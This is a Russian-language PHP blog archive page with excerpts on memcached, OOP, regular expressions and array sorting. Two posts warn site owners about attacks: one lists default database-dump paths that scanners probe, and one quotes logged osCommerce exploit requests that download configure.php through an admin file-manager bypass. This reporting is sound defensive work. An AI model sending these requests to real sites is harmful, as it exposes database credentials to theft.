Архив рубрики: Php

Что такое HTTP_RAW_POST_DATA?

Возник вопрос:
что такое HTTP_RAW_POST_DATA?

ВНИМАНИЕ:
С PHP 5.6.0 рекомендуется не использовать $HTTP_RAW_POST_DATA, этот функционал полностью исключен в PHP 7.0.0

Разберемся:

1) Что это такое?
$HTTP_RAW_POST_DATA содержит необработанные (сырые) POST-данные.
т.е. если мы передаем через POST следующий массив данных: Читать далее

Не запускаются скрипты на сервере. 500 – ошибка

Обнаружил проблему: не запускаются php скрипты на сервере.
В заголовках: ошибка 500 Internal Server Error.

В переменной $_SERVER появляется много новых переменных:
Читать далее

Что такое memcached. Зачем это нужно.

Memcached – это программа (сервер) позволяющая кэшировать данные в оперативной памяти. Под многие языки программирования написаны клиентские библиотеки, которые выступают посредниками при работе с данным сервером.

Основные принципы работы с memcache объясним на примере:

$memcache = new Memcache;
// Подключаемся к серверу
$memcache->connect('localhost', 11211);
$value = 1;
//сохраняем значение $value на 10 сек
$memcache->set('key', $value, false, 10);
//Получаем значение
$get_result = $memcache->get('key');

Рассмотрим процесс установки memcahced под Windows (потребуются установленные php и Apache): Читать далее

Разбираюсь в основах ООП на php

Столкнулся с тем, что до сих пор не знаю основных понятий ООП.  Поэтому попробую разобраться.

Объектно-ориентированное программирование основано на следующих понятиях:

  • Инкапсуляции;
  • Полиморфизм;
  • Наследовании.

Читать далее

Как сортировать по параметрам ассоциативного массива.

Возника задача сортировки ассоциативного массива по определенному параметру.
Например, есть массив с товарами, а нужно отсортировать массив по цене или по названию товара.

Это можно сделать следующими функциями: Читать далее

Регулярные: удаляем все кроме цифр

Несколько полезных регулярных выражений:

 

 

 

Удаляем все кроме цифр и запятых:

$ids = preg_replace('/[^0-9,]/', '', $ids);

Удаляем все кроме букв цифр и пробелов:

$st = preg_replace ("/[^a-zA-ZА-Яа-я0-9\s]/","",$st);

или

preg_replace('![^\w\d\s]*!','',$str);

Безопасность: не храните бэкап сайта на хостинге.

Вы знаете как проще всего украсть базу данных вашего сайта?

Ее можно просто скачать с вашего сервера. Многие люди оставляют бэкапы там где их оставили ваши CMS или скрипты. и Злоумышленники могут найти их и скачать по стандартным названиям.

Вот пути по которым ищутся дампы:
/mysqld.sql
/zencart.sql
/database.sql
/dba.sql
Читать далее

Уязвимость в сайтах на osCommerce

Продолжаю про новые проверки на сайте:

Сегодня были запроса вида:
/admin/file_manager.php/login.php?action=download&filename=%69%6E%63%6C%75%64%65%73%2F%63%6F%6E%66%69%67%75%72%65%2E%70%68%70
/shop//admin/file_manager.php/login.php?action=download&filename=%69%6E%63%6C%75%64%65%73%2F%63%6F%6E%66%69%67%75%72%65%2E%70%68%70
/catalog//admin/file_manager.php/login.php?action=download&filename=%69%6E%63%6C%75%64%65%73%2F%63%6F%6E%66%69%67%75%72%65%2E%70%68%70
/store//admin/file_manager.php/login.php?action=download&filename=%69%6E%63%6C%75%64%65%73%2F%63%6F%6E%66%69%67%75%72%65%2E%70%68%70

Читать далее